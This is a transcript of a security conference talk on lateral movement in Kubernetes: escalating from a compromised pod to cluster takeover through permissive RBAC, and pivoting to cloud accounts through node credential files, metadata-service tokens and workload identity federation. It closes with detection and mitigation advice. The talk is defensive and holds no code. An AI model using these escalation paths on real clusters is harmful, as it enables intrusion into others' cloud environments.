 I'm Yossi Weizman and with me is Ron Pliskin. We are from Microsoft Defender for Cloud and today we are going to talk about lateral movement in Kubernetes. So this is the agenda for today. We will start with talking about identities in Kubernetes. Then we will talk about inner cluster lateral movement. We will speak about cluster to cloud lateral movement in the various cloud providers. Then we will talk about detections and mitigations and then we will have some key takeaways. So let's start. So let's start with an overview about identities in Kubernetes. So when we're talking about identities in Kubernetes, we usually talking about three main areas. The first one is how do users or applications in the cluster from outside the cluster authenticate with the cluster? So for example, if I need to deploy resources or I have a DevOps pipeline that need to deploy resources, how do we authenticate with the cluster? The second one is how do workloads in the cluster authenticate within the cluster with the Kubernetes API server? And the third one is how workloads in the cluster authenticate with resources in the cloud outside the cluster. For example, if I have a pod that needs access to a cloud storage, so how does this pod authenticate with the cloud storage? In our talk, we will focus on point two and three. Point two will be relevant for the inner cluster lateral movement. And point three will be relevant for the cluster to cloud lateral movement. So we are starting with inner cluster lateral movement and let's assume that we have a pod in our clusters that is compromised. Now pods can become compromised in multiple ways. Let's say that I have a pod that runs a web application and that web application is vulnerable and somebody exploited this vulnerability. So now we have a cluster with a vulnerable pod. So here we can see Kubernetes cluster. You can see the control plan and you can see the nodes that are running the pods. And here is pod A, which is compromised. So what is lateral movement in the cluster? So it could be multiple things. It could be a movement from one pod to another pod. It could be a movement from a pod to a node. And ideally, attackers would like to get a cluster takeover, which means that they would have a full control over the entire workload. And the question is, how can attackers leverage the compromised pod that they have access to to gain cluster takeover? In other words, we are asking which tools does the attacker have to move laterally in the cluster? So here we can see two identity types that we have inside the clusters. The first one is the service account that is used by pod A. So if the attacker has access to pod A, obviously they also have access to the service account token of pod A. And the second one is the nodes identity that is used by Kubelet. So if attackers somehow manage to escape from pod A to the underlying node, or they somehow manage to get access to the file system of the underlying node, and we will see how they might achieve that shortly. So they can also use this identity. All right. So how can attackers leverage those identities? The good news are that it becomes a little bit more difficult now, and it becomes a little bit more difficult because in newer versions of Kubernetes, there are some security features that restrict operation that can lead to cluster takeover and lateral movement. We are going to talk about two notable ones. So the first one is that now read secret access does not give you... So read secret permissions isn't enough for lateral movement. In the past, as probably many of you know, Kubernetes store token of service accounts as secret objects. So if I could read secrets, so I could also read tokens of service accounts. In newer versions of Kubernetes, it's not the case, and Kubernetes doesn't store automatically secrets, tokens of service accounts as Kubernetes secrets. And if I want to acquire a token, I must use a dedicated API call that gives me a short-lived one. The second thing is that node takeover doesn't mean necessarily a cluster takeover. So in the past, once you obtain the identity of the node, the kubelet identity, you became practically a cluster admin because this identity is very permissive. But in newer versions of Kubernetes, it's not the case because the kubelet is restricted and can only control resources that are scheduled on its own node, which means on that particular node. So it doesn't mean a cluster takeover anymore. This is achieved by the node authorizer and the node restriction admission controller. So there were some improvement in this area, but some common misconfigurations still allow lateral movement. And now we will see a real-world example that was the root cause of a vulnerability in a container as application. All right, so in our example, we have application that has the permission to update itself. So what does it mean? So in this case, we have a deployment resource that uses a service account that has permissions to update the deployment object. So you can see here that we have a cluster role definition that the service account is bound to and it has permissions to update this specific deployment, okay? You can see the resource name that specify this specific deployment. So this is the cluster role definition. So maybe it sounds harmless because now we have a deployment that has a service account that can update itself, not other objects in the cluster. So it sounds maybe okay, it sounds fine. I mean, it can update only itself. But it means that now I can update my own configuration. And specifically, it means that the application can change its configuration to run a privileged container. And if a container is now privileged, it can access to the underlying node. And if it can access to the underlying node, it can access to the node's identity, like we said. Now, as we said, right now achieving the node's identity doesn't necessarily mean a cluster takeover, like we explained. But we can also specify in the configuration that we want to be scheduled on a specific node by using the node selector. So what we have now is the ability to deploy a privileged container and we can decide on which node we want to deploy it. So practically we achieve the cluster takeover. Let's see it. So we have a pod. It can change its own deployment configuration. So now we have a new pod. Now, this time the pod is privileged and it can access to the underlying node. Now we will schedule one on node two and now we will schedule one on node three. So now we have a cluster takeover. So in this example, we saw permission that may lead to cluster takeover. And again, it was based on a real-world vulnerability. Let's go over a few more permissions that also may lead to cluster takeover. All right, so this is the table. So the first one is very similar to what we just saw. If you can create a new pod or you can create a new controller in the cluster, so you can use, so you can specify its configuration, you can specify it to be privileged and you can specify also the node that you want to be scheduled on and practically you can become a cluster admin. The second one is actually what we just talked about. It's the update controller. In our case, we updated a deployment, but it could be any other controller as well. The third one is an interesting one because as we said before, in your versions of Kubernetes, Kubernetes doesn't automatically create secrets with tokens of service accounts. However, as a user, I can still manually create a secret and specify that I want it to be a token for a service account. I just annotate the secret with the name of the service account that I want. So if I have the permissions to create a new secret and then I have the permission to read its value so I can get a long live token of any service account that I want. And the fourth one here in the table is the permission that you need in order to create short live token. So that was inner cluster lateral movement. Now we will move to the second topic which is lateral movement from the cluster to the cloud. And we will see how the two topics are actually sometimes related to each other. Thanks, Yossi. So after we talked about lateral movement inside Kubernetes clusters, we will now move on to the second topic which is lateral movement from cluster to cloud resources that are outside of the cluster. So let's try to assess the imminence of an attacker pivoting from a cluster to the underlying cloud environment. Coming to do so, we should first acknowledge the different needs of which a managed cluster interacts with cloud resources. And there are two type of interactions. First, the maintenance routines ones. For example, with Kubernetes being so dynamic it frequently needs to allocate or decommission VM. This is done by ongoing engagement with cloud APIs. The second type of interaction is, sorry, the second type of interaction is sourcing from the need to support customer workloads. For example, customer runs a pod that has a web service inside and this web service pushes data or reads data from S3 bucket that is outside of the cluster. So as you can expect, clusters that lives inside the cloud are tightly coupled with its resources. So how Kubernetes cluster authenticate themselves against cloud APIs? And the answer for this is that there are advancements in the way that Kubernetes cluster can establish trust with cloud resources. In our talk today, we'll go over the following method of authentications. So the first one is by storing a file locally on the Kubernetes node that stores cloud credentials. Then we will talk about direct and indirect access to IMDS. Lastly, we will show our Kubernetes identities are being federated as cloud identities, which is now powered by OpenID Connect. And while we dive into each of these methods, we will demonstrate our attackers can also leverage each of the methods to advance their foothold from cluster to cloud. So we are starting off with the way that AKS used to authenticate with Azure resources. With this method, AKS stores a file that has a service principle secret on it and it was stores on each of the Kubernetes nodes. Service principles are application-based identities in Azure. They are like service accounts in Kubernetes. With this authentication method, access to the nodes file system meant elevation to a contributor role scoped to the Azure resource group that hosts the cluster. So now let's see it in action how attackers can leverage it. So let's assume PODE is compromised and it has a service account attached to it. Now, if this service account is authorized to create new pods, that attacker can abuse this permission and create a new pod with the configurations that mounts the credential file to it. This mount results with a new container that can access the local cred file and may cause under the SPN identity. And this is how a attacker could have achieved a backdoor container with access to Azure APIs. And as mentioned, this was the default configuration for AKS in the past. Note that for this method, the attacker needed access to the underlying node. In most deployment, it's not a trivial, it's not trivial to break the container isolation. In the next method coming up, we will see that escaping from a container is no longer a requirement. So let's move on to the second authentication method that is currently the default in Azure, AWS and GCP. So we're gonna talk about IMDS. IMDS stands for instance metadata service it is a special endpoint that is accessible for every VM hosted in the cloud. This type of service is implemented by all three major cloud providers. It basically allows VM in the cloud to query parameters about themself. For example, what is my cloud identifier? In which region I am deployed or what are my network settings? But also, and perhaps most interestingly, VMs can ask IMDS for token that represent cloud identities. All cloud providers support attachment of identities to VM. In Azure, we call it managed identity. In AWS, it's called EC2 role and it GCP is a service account. So here you can see how those APIs look in each of the cloud providers and one important note is that IMDS endpoints does not require authentication. For security, it relies on the fact that each VM can only query its own metadata service. In managed clusters, Kubernetes nodes are VMs in the cloud, right? So as such, they have access to the metadata service like any other VM. So by default, pods can also access their nodes metadata service. That means that pod can acquire token of the identities assigned to the node they are running on. And of course, the permission of these tokens will have depend on the cloud provider and the specific configuration of the environment which we'll now see how it looks like in Azure, AWS and GCP. We will start with Azure. So AKS cluster uses managed identities for their operation. Perhaps worth calling out that a managed identity is behind the scene a service, a special type of service principle and the difference between managed identities to SPN is that managed identities eliminates the need for developers to manage its credentials. So this is the list of default managed identities by AKS. Some of them are quite powerful. In red, you can see that in some configuration the managed identities have a contributor role on the nodes resource group. Also, users can add more managed identities or modify existing permissions of existing managed identities. All depends on their need. For example, if my applications need access to a storage account or to a key vault, I can add permissions to these resources for an existing managed identity. So like the table from previous slide, AWS operates in a similar manner. AKS cluster uses EC2 roles for their operations. So we see three roles. The first role we see includes permission to fetch images from container registry. The second one has permissions of compute resources and the third one has permissions to edit the network configuration of an AKS cluster. GKE also comes with built-in IAM service account, but interestingly, GKE uses the default compute engine service account that has editor role assigned to it. This knowingly challenges the security boundary of the GKE cluster. It means that if a pod in GKE gets compromised, the permission that attacker can achieve goes beyond the cluster. It can impact the entire project. For folks here that works with GKE, it's true that the permission are limited by access scopes which restrict the APIs that this service account can access to, but even with this limitation, this role is still quite powerful. For example, it has read data permission, it can read data permission, it can read data from any cloud storage in the project. As you can see in the image on the slide. So how does lateral movement look like in this method? Here again is our cluster. Let's keep only one node to simplify things a bit. So as we discussed, this node has access to an IMDS instance. Now the pod can retrieve token for a cloud identity. The metadata service returns a valid token and depends on the permissions assigned to that identity. This pod can query different cloud APIs. So for example, it can read files from cloud storage services. Another example would be fetching secrets from Azure Key Vault or AWS KMS. Or even getting the credentials of other Kubernetes clusters that are deployed in the cloud. It always boils down to the permission assigned to the identity which the attacker can acquire tokens for. So what problem we just saw? On the one hand, we saw that pods can freely access their nodes identity and we should probably want to limit that. But at the same time, in some cases, pods may need to legitimately acquire token to support the workload they are running. So we want to allocate a specific identity to each pod that's needed and we wanna make sure that pods have granular access to these identities. Luckily, this can be achieved and we are going to see two concepts that serves this goal. The first one is indirect access to IMDS and the second is through a federation of Kubernetes identities as cloud identities. Let's start with indirect access to IMDS. So we are not going to elaborate too much here because this mechanism is not commonly used anymore but in general, in this method, when a pod calls IMDS, its traffic is redirected to a local server. Then the local server queries IMDS on the pod's BF and this is implemented by AAD pod identity project which is now in deprecation. So we will quickly go over our AAD pod identity operates. The first step is that traffic form per day to IMDS is intercepted and redirected to a local server. That's the NMI pod that you see in the screen. Then the local server requests pod's A identity from the metadata service and with step three, the NMI returns IMDS response, the token back to pod A. AAD pod identity has few limitations and that we won't really cover today but I should just mention that AAD pod identity does not support all CNIs. All right, thanks Rao. So now we'll move to the last method for cloud authentication. It's the last method in which pods in the cluster can authenticate with the cloud and it is based on OIDC or OpenID Connect. So this method is implemented by all major cloud providers. It's implemented by Azure, AWS and GCP. Here you can see how each cloud provider calls to this feature, so in Azure it's AAD workload identity, in AWS it's IRS A and GCP it's workload identity. In GCP, they actually use in their implementation some aspects of the previous concept that we saw. They use, they also intercept the traffic from IMDS to IMDS to a local server. But generally the concept is similar between the cloud providers. So in this method, the Kubernetes cluster is used as an OIDC identity provider and it means that the cloud identity platforms such as Azure Active Directory or other identity platforms can trust tokens that are issued by the cluster. And because of this trust, applications in the cluster can exchange a token of a service account with a token of a cloud identity. And this is a big advantage of this method because it means that now pods can authenticate with the cloud using their native identity, native Kubernetes identity, which is their service accounts because this is a big difference between what we saw, between this and what we saw so far because so far we saw that if a pod wants to authenticate with the cloud, so the pod needs somehow to acquire a token of the cloud. It needs a cloud credential. But now we can see that pods can authenticate with the cloud using their own identity, using the service accounts that they already have. So the way it works is so users can bind between a Kubernetes service account and the cloud identity. And after this binding that is called Federation, applications can exchange the Kubernetes service account with the correlating cloud identity. All right, so let's see in high level the flow how this works. So first, Kublet project assigned service account token to the pod and this is a valid JWT token that is signed by the cluster. All right, so now our pod has a JWT token of the service account and then the pod can send it to the cloud identity service again, like Azure Active Directory or AWS IAM or GCP and it requests to exchange the service account token with an identity token. So now the cloud identity service verifies that this service account token is indeed legitimate and the cloud identity service checks that the token was indeed issued by the cluster that the service trust. And it does it by using the cluster OIDC endpoint and if the verification was successful, the cloud identity platform will return a cloud identity token to the pod. So now our pod has a valid cloud credential, cloud token, and it can use it to authenticate with cloud resources. For example, again, it can authenticate with the cloud storage, for example, if it needs to. So this is an example from AAD, from Azure Active Directory, and you can see this binding, this kind of federation. So we have in this page you can see it's a setting of a specific AAD application and you can see that we bind to this application as a Kubernetes service account. You can see the name of the service account that will be bound and you can also see the OIDC endpoint that AAD will use to validate this service account token. All right, so let's talk for a moment about GCP specifically because in GCP there is something interesting. In GCP there is a unified identity pool for the entire project and what does it mean? It means that there is a single binding between a cloud identity and service account and service account is represented by the namespace name plus the service account name. So let's see an example. So we see two clusters here, two clusters. We have cluster A and we have cluster B. They are in the same project. Both have namespace with the same name and the service account with the same name. So both have a namespace called monitoring and the service account named SA1. And if we bind to this service account with the cloud identity, in this case it's called MyCloudApp. So it means that both service accounts bound to the same cloud identity, all right? That's how it works. Now let's say that we have another cluster in our project. Let's call it cluster C. And let's say that this cluster is compromised, okay? For example, we saw in the first section how attacker might get the cluster takeover. So this cluster, cluster C is compromised. And now if the attackers can create a namespace and the service account, assuming they can if they gain the cluster takeover. So they can impersonate to that cloud identity, right? Because there is only one binding per project. So if they can create a service account and the namespace with the same name, so they get access to this cloud identity. So as we said, attackers has access to the cloud identity just by creating resources in a specific name. So what we see here is that we must trust all our clusters in the project, okay? And many times we consider our security boundary as the cluster, that everything in the cluster, I mean that there is trust in the cluster but not outside the cluster. But here we can see that our security boundary is actually not the cluster, but the entire project. And we see it once again. So this is what we saw so far. We talked about inner cluster lateral movement and we talked about cluster to cloud lateral movement. And now let's talk about how we can detect and prevent those techniques. All right, so we'll start with detection. We'll talk about detections and mitigations. Let's start with detections. So as we already saw, when we're talking about Kubernetes, we must consider both Kubernetes level and the cloud level. And this applies also to detections and mitigations. In Kubernetes, when it comes to detection, we have a very powerful tool for monitoring the cluster and it's called Kubernetes audit log. It's native in Kubernetes and it gives you visibility to the operations in the cluster. It basically monitors the Kubernetes API server. And you can use it, for example, to detect deployment of abnormal images, a pod with suspicious configurations, for example, with suspicious volume mounts and also reconnaissance activity and more suspicious operations. Cloud providers also have auditing services. Each cloud provider has an auditing service that allow you to track the behavior of the cloud identities. Now, of course, also the cloud identities that are used by the Kubernetes workloads. And here in this example, we can see Azure activity log, which is the auditing service of Azure. And you can see here in the image that we see a managed identity. We see cloud identity that is used by Kubernetes that reads storage account keys. So maybe it's suspicious, it's something that you want to monitor. In other clouds, you have also such services, cloud trail in AWS and in GCP, cloud audit logs. All right, so that was detections. Now let's speak about mitigations. So in December, we released the third version of the threat metrics for Kubernetes. The threat metrics is a knowledge base of attacking techniques of Kubernetes. So the new version now also contains mitigation techniques. The threat metrics is completely open sourced and you can see it in this address. So let's see how we can work with it. So here is the new threat metrics for Kubernetes. Again, it's open sourced. So we can see the tactics and the techniques in each tactic. So let's go to the lateral movement tactic because we just talked about lateral movement and let's pick a technique. Let's pick access to cloud resources. So here is a technique that talks about lateral movement from the cluster to the cloud, like our session, and you can see the description of this technique. And in the bottom, you can now find the mitigation techniques which can help you to prevent this attacking from happening. So let's pick one mitigations. So we picked allocate specific identities to pods and here you can see the description of this mitigation technique. Let's see another example quickly. So let's go to the technique container service account which talks about how attackers might use service accounts for lateral movement in the cluster. And once again, you can see the description of the attacking technique. Let's go to mitigations and let's pick one. For example, disable service account auto mount. And here you can see the mitigation. Thanks. So as we enter the closing section of this presentation, I will share a bit about the process behind building this metrics. In general, we kicked off the journey of building knowledge base or threat metrics for services that we put in the effort of building security offerings for them. We decided to rely on Mitra attack framework as it become de facto the leading standard for the entire EDR industry. Back at the time, we knew that Mitra attacks are too focused on the operating system level and it lacks visibility to cloudish and container TTPs. Together with Kubernetes being so rapidly adopted, this drove us to experiment with building a knowledge base of attack techniques dedicated for Kubernetes. And so we released the first version of the Microsoft threat metrics for Kubernetes in April 2020. Shortly after the release, we realized how well it was resonated within the container ecosystem. With customers starting to measure our coverage based on this metrics and even competitors sharing their areas of strength on top of our metrics, eventually this led to Mitra to embrace a large portion of Microsoft metrics into their enterprise attack framework which was announced by a joint publication between Microsoft and Mitra in April 2021. And as Yossi just described, we released the third version of Microsoft metrics in December 2022 where we aim to introduce a new layer that consists of mitigation techniques. Our motivation was to map each TTP to corresponded mitigation steps that will instruct Kubernetes user on how they should reduce their attack surface. Hopefully this dimension of mitigation step will prevent Kubernetes attacks to begin with. So key takeaways. So we demonstrated here today that even with the great security advancements that being pushed to Kubernetes, and even with the efforts that led by cloud providers that wrap Kubernetes clusters, there is still much work ahead of us as a community to strengthen the overall security posture of managed clusters. As a quick recap of today's session, so we saw the maturity of shifting away from storing locally permissive creates files to all major cloud providers now support federation of Kubernetes identities and binding them with cloud identities. As an industry, we have proven to take significant steps towards more secure environments, but in the meantime, we also saw that built-in managed clusters, identities of built, built-in identities of managed clusters can be abused and manipulated. And this is, and are in some cases, they themselves violating the security boundary of the clusters. Therefore, we are calling you to one, implement a holistic strategy for Kubernetes security by considering both cluster and cloud levels. Identities are key aspects of Kubernetes security. So monitor their activity using auditing tools and adhere to the least privileged principle. And lastly, use the mitigation metrics to prevent potential attacks. And with that, thank you.